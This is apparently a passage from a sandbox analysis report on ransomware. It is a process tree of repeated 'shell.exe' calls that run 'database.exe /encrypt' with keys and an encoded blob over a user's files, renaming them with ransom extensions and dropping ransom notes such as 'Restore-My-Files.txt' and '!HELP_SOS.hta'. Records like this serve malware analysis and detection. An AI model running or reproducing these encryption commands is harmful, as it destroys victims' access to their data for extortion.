                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SyncPublish.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\TraceRename.jpeg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\UnpublishOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\WaitRequest.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\WatchComplete.ico.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Saved Games\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Saved Games\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Everywhere.search-ms.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Indexed Locations.search-ms.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Searches\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Videos\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Videos\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\2720DE842C148E18C1E0270ABEF877C91C879E2B7AB4070B193C1EFF3F1AC1CA"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Documents\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
